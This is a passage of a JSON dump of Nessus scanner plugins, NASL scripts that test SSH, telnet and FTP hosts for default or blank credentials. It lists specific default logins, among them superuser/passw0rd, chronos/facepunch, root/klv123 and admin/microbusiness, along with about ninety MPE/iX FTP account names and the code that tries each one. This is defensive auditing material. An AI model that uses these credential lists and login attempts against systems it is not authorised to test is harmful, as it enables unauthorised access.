script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2001/01/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2003/02/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2003-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"find_service1.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\n#\n# The script code starts here : \n#\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T15:43:02", "description": "The account 'superuser' on the remote host has the password 'passw0rd'. An attacker can leverage this issue to gain administrative access to the affected system.\n\nNote that IBM Storwize devices are known to use these credentials to provide administrative access to the device.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2015-01-23T00:00:00", "type": "nessus", "title": "Default Password (passw0rd) for 'superuser' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_SUPERUSER_PASSW0RD.NASL", "href": "https://www.tenable.com/plugins/nessus/80964", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"superuser\";\npassword = \"passw0rd\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(80964);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Default Password (passw0rd) for 'superuser' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote system can be accessed with a default account.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'superuser' on the remote host has the password\n'passw0rd'. An attacker can leverage this issue to gain administrative\naccess to the affected system.\n\nNote that IBM Storwize devices are known to use these credentials to\nprovide administrative access to the device.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Set a strong password for this account or use ACLs to restrict access\nto the host.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-1999-0502\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/23\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_detect.nasl\", \"account_check.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/ssh\", 22);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, nosh:TRUE, nosudo:TRUE, cmd:\"lsuser\", cmd_regex:\"^id\", port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, nosh:TRUE, nosudo:TRUE, cmd:\"lsuser\", cmd_regex:\"^id\", port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T15:33:38", "description": "The account 'chronos' on the remote host has the password 'facepunch'.\n\nAn attacker may leverage this issue to gain access to the affected system.\n\nNote that some builds of Chromium OS are known to use these credentials and allow one to gain root access with 'sudo'.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2013-04-03T00:00:00", "type": "nessus", "title": "Default Password (facepunch) for 'chronos' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_CHRONOS_FACEPUNCH.NASL", "href": "https://www.tenable.com/plugins/nessus/65790", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\n\naccount = \"chronos\";\npassword = \"facepunch\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(65790);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Default Password (facepunch) for 'chronos' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote system can be accessed with a default account.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'chronos' on the remote host has the password\n'facepunch'.\n\nAn attacker may leverage this issue to gain access to the affected\nsystem.\n\nNote that some builds of Chromium OS are known to use these\ncredentials and allow one to gain root access with 'sudo'.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Set a strong password for this account or use ACLs to restrict access\nto the host.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-1999-0502\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/04/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_detect.nasl\", \"account_check.nasl\", \"telnetserver_detect_type_nd_version.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T16:06:59", "description": "The account 'admin' on the remote host has the default password '54321'. A remote attacker can exploit this issue to gain administrative access to the affected system.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-10-28T00:00:00", "type": "nessus", "title": "Default Password '54321' for 'admin' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_ADMIN_54321.NASL", "href": "https://www.tenable.com/plugins/nessus/94366", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"admin\";\npassword = \"54321\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(94366);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Default Password '54321' for 'admin' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote system can be accessed with a default administrator\naccount.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'admin' on the remote host has the default password\n'54321'. A remote attacker can exploit this issue to gain\nadministrative access to the affected system.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Change the password for this account or disable it.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-1999-0502\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"find_service1.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T16:08:03", "description": "The account 'root' on the remote host has the default password 'klv123'. A remote attacker can exploit this issue to gain administrative access to the affected system.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-10-28T00:00:00", "type": "nessus", "title": "Default Password 'klv123' for 'root' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_ROOT_KLV123.NASL", "href": "https://www.tenable.com/plugins/nessus/94393", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"root\";\npassword = \"klv123\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(94393);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Default Password 'klv123' for 'root' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An administrative account on the remote host uses a known default\npassword.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'root' on the remote host has the default password\n'klv123'. A remote attacker can exploit this issue to gain\nadministrative access to the affected system.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Change the password for this account or disable it.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-1999-0502\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"find_service1.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T13:20:44", "description": "The remote FTP server has one or more accounts with a blank password.", "cvss3": {"score": null, "vector": null}, "published": "2002-06-05T00:00:00", "type": "nessus", "title": "MPEi/X Default FTP Accounts", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2018-07-25T00:00:00", "cpe": [], "id": "DDI_MPEIX_FTP_ACCOUNTS.NASL", "href": "https://www.tenable.com/plugins/nessus/11000", "sourceData": "\n# This script was written by H D Moore <hdmoore@digitaldefense.net>\n#\n# See the Nessus Scripts License for details\n#\n\n# Changes by Tenable:\n# - Revised plugin title, changed family (11/04/10)\n\ninclude(\"compat.inc\");\n\nif(description)\n{\n script_id(11000); \n script_version (\"1.22\");\n script_cvs_date(\"Date: 2018/07/25 16:19:22\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"MPEi/X Default FTP Accounts\");\n script_summary(english:\"Checks for open accounts\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote FTP server has one or more account with a blank\npassword.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote FTP server has one or more accounts with a blank\npassword.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply complex passwords to all accounts.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:TF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\nscript_set_attribute(attribute:\"plugin_publication_date\", value:\n\"2002/06/05\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2001/01/01\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_end_attributes();\n \n script_category(ACT_GATHER_INFO);\n \n script_copyright(english:\"This script is Copyright (C) 2002-2018 H D Moore\");\n script_family(english:\"FTP\");\n script_dependencie(\"find_service1.nasl\", \"ftpserver_detect_type_nd_version.nasl\");\n script_require_ports(\"Services/ftp\", 21);\n exit(0);\n}\n\ninclude(\"ftp_func.inc\");\n\n#\n# default account listing\n#\naccounts[0] = \"OPERATOR.SYS\";\naccounts[1] = \"MANAGER.SYS\";\naccounts[2] = \"SPECTRUM.CU1\";\naccounts[3] = \"CU1.DBA\";\naccounts[4] = \"CU1.MANAGER\";\naccounts[5] = \"CU1.MGR\";\naccounts[6] = \"CUTEST1.MANAGER\";\naccounts[7] = \"CUTEST1.MGR\";\naccounts[8] = \"CUTRAIN.MANAGER\";\naccounts[9] = \"CUTRAIN.MGR\";\naccounts[10] = \"SUPPORT.FIELD\";\naccounts[11] = \"SUPPORT.MANAGER\";\naccounts[12] = \"SUPPORT.MGR\";\naccounts[13] = \"SUPPORT.OPERATOR\";\naccounts[14] = \"SYS.MANAGER\";\naccounts[15] = \"SYS.MGR\";\naccounts[16] = \"SYS.NWIXUSER\";\naccounts[17] = \"SYS.OPERATOR\";\naccounts[18] = \"SYS.PCUSER\";\naccounts[19] = \"SYS.RSBCMON\";\naccounts[20] = \"SYSMGR.MANAGER\";\naccounts[21] = \"SYSMGR.MGR\";\naccounts[22] = \"TELAMON.MANAGER\";\naccounts[23] = \"TELAMON.MGR\";\naccounts[24] = \"TELESUP.FIELD\";\naccounts[25] = \"TELESUP.MAIL\";\naccounts[26] = \"TELESUP.MANAGER\";\naccounts[27] = \"TELESUP.MGR\";\naccounts[28] = \"VECSL.MANAGER\";\naccounts[29] = \"VECSL.MGR\";\naccounts[30] = \"VESOFT.MANAGER\";\naccounts[31] = \"VESOFT.MGR\";\naccounts[32] = \"BIND.MANAGER\";\naccounts[33] = \"BIND.MGR\";\naccounts[34] = \"CAROLIAN.MANAGER\";\naccounts[35] = \"CAROLIAN.MGR\";\naccounts[36] = \"CCC.MANAGER\";\naccounts[37] = \"CCC.MGR\";\naccounts[38] = \"CCC.SPOOL\";\naccounts[39] = \"CNAS.MGR\";\naccounts[40] = \"COGNOS.MANAGER\";\naccounts[41] = \"COGNOS.MGR\";\naccounts[42] = \"COGNOS.OPERATOR\";\naccounts[43] = \"CONV.MANAGER\";\naccounts[44] = \"CONV.MGR\";\naccounts[45] = \"HPLANMANAGER.MANAGER\";\naccounts[46] = \"HPLANMANAGER.MGR\";\naccounts[47] = \"HPNCS.FIELD\";\naccounts[48] = \"HPNCS.MANAGER\";\naccounts[49] = \"HPNCS.MGR\";\naccounts[50] = \"HPOFFICE.ADVMAIL\";\naccounts[51] = \"HPOFFICE.DESKMON\";\naccounts[52] = \"HPOFFICE.MAIL\";\naccounts[53] = \"HPOFFICE.MAILMAN\";\naccounts[54] = \"HPOFFICE.MAILROOM\";\naccounts[55] = \"HPOFFICE.MAILTRCK\";\naccounts[56] = \"HPOFFICE.MANAGER\";\naccounts[57] = \"HPOFFICE.MGR\";\naccounts[58] = \"HPOFFICE.OPENMAIL\";\naccounts[59] = \"HPOFFICE.PCUSER\";\naccounts[60] = \"HPOFFICE.SPOOLMAN\";\naccounts[61] = \"HPOFFICE.WP\";\naccounts[62] = \"HPOFFICE.X400FER\";\naccounts[63] = \"HPOPTMGT.MANAGER\";\naccounts[64] = \"HPOPTMGT.MGR\";\naccounts[65] = \"HPPL85.FIELD\";\naccounts[66] = \"HPPL85.MANAGER\";\naccounts[67] = \"HPPL85.MGR\";\naccounts[68] = \"HPPL87.FIELD\";\naccounts[69] = \"HPPL87.MANAGER\";\naccounts[70] = \"HPPL87.MGR\";\naccounts[71] = \"HPPL89.FIELD\";\naccounts[72] = \"HPPL89.MANAGER\";\naccounts[73] = \"HPPL89.MGR\";\naccounts[74] = \"HPSKTS.MANAGER\";\naccounts[75] = \"HPSKTS.MGR\";\naccounts[76] = \"HPWORD.MANAGER\";\naccounts[77] = \"HPWORD.MGR\";\naccounts[78] = \"INFOSYS.MANAGER\";\naccounts[79] = \"INFOSYS.MGR\";\naccounts[80] = \"ITF3000.MANAGER\";\naccounts[81] = \"ITF3000.MGR\";\naccounts[82] = \"JAVA.MANAGER\";\naccounts[83] = \"JAVA.MGR\";\naccounts[84] = \"RJE.MANAGER\";\naccounts[85] = \"RJE.MGR\";\naccounts[86] = \"ROBELLE.MANAGER\";\naccounts[87] = \"ROBELLE.MGR\";\naccounts[88] = \"SNADS.MANAGER\";\naccounts[89] = \"SNADS.MGR\";\n\n#\n# The script code starts here\n#\n\n# open the connection\nport = get_ftp_port(default:21);\n\n# exit if this is a JetDirect\nJD = get_kb_item(\"ftp/\"+port+\"/JetDirect\");\nif (JD)exit(0);\n\n\nbanner = get_ftp_banner(port:port);\n\n# check for HP ftp service\nif(\"HP ARPA FTP\" >< banner)\n{\n # do nothing\n} else {\n exit(0);\n}\n\nsoc = open_sock_tcp(port);\nif (!soc) exit(1, \"Cannot connect to TCP port \"+port+\".\");\nd = ftp_recv_line(socket:soc);\n\nCRLF = raw_string(0x0d, 0x0a);\ncracked = string(\"\");\n\nfor(i=0; accounts[i]; i = i +1)\n{\n username = accounts[i];\n user = string(\"USER \", username, CRLF); \n \n send(socket:soc, data:user);\n resp = ftp_recv_line(socket:soc);\n \n if (\"230 User logged on\" >< resp)\n {\n cracked = string(cracked, username, \"\\n\");\n }\n}\nftp_close(socket:soc);\n\nif (strlen(cracked))\n{\n report = string(\"\\nThese accounts have no passwords:\\n\\n\", cracked);\n security_hole(port:port, extra:report);\n}\n\n\n\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-19T03:22:21", "description": "The remote host is a Pirelli AGE mB (microBusiness) router with its default password set (admin/microbusiness).\n\nAn attacker could telnet to it and reconfigure it to lock the owner out and to prevent him from using his Internet connection, and do bad things.", "cvss3": {"score": null, "vector": null}, "published": "2004-07-09T00:00:00", "type": "nessus", "title": "Pirelli AGE mB Router Default Password (microbusiness) for 'admin' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2015-10-09T00:00:00", "cpe": [], "id": "PIRELLI_ROUTER_DEFAULT_PASSWORD.NASL", "href": "https://www.tenable.com/plugins/nessus/12641", "sourceData": "#\n\n# Changes by Tenable:\n# - only attempt to login if the policy allows it (10/25/11 and 6/2015)\n# - Revised plugin title, formatted output (8/20/09)\n# - Updated to use global_settings.inc (6/2015)\n\ninclude(\"compat.inc\");\n\nif(description)\n{\n script_id(12641);\n script_version (\"$Revision: 1.15 $\");\n script_cvs_date(\"$Date: 2015/10/09 22:45:48 $\");\n\n script_cve_id(\"CVE-1999-0502\");\n \n script_name(english:\"Pirelli AGE mB Router Default Password (microbusiness) for 'admin' Account\");\n script_summary(english:\"Logs into the router Pirelli AGE mB.\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host can be accessed by known default credentials.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is a Pirelli AGE mB (microBusiness) router with its \ndefault password set (admin/microbusiness).\n\nAn attacker could telnet to it and reconfigure it to lock the owner out \nand to prevent him from using his Internet connection, and do bad things.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Telnet to this router and set a new password immediately.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/07/09\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"(C) 2004-2015 Anonymous - This script is free\");\n\n script_require_ports(23);\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n \n exit(0);\n}\n\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\n\nport = 23;\nif(get_port_state(port))\n{\n if (supplied_logins_only) exit(0, \"Policy is configured to prevent trying default user accounts\");\n banner = get_telnet_banner(port:port);\n if ( ! banner || \"USER:\" >!< banner ) exit(0);\n\n #First try as Admin\nsoc = open_sock_tcp(port);\n if(soc)\n {\n r = recv_until(socket:soc, pattern:\"(USER:|ogin:)\");\n if ( \"USER:\" >!< r ) exit(0); \n s = string(\"admin\\r\\nmicrobusiness\\r\\n\");\n send(socket:soc, data:s);\n r = recv_until(socket:soc, pattern:\"Configuration\");\n close(soc);\n if( r && \"Configuration\" >< r )\n {\n security_hole(port);\n exit(0);\n }\n }\n #Second try as User (reopen soc beacause wrong pass disconnect)\n soc = open_sock_tcp(port);\n if(soc)\n {\n r = recv_until(socket:soc, pattern:\"(USER:|ogin:)\");\n if ( \"USER:\" >!< r ) exit(0);\n s = string(\"user\\r\\npassword\\r\\n\");\n send(socket:soc, data:s);\n r = recv_until(socket:soc, 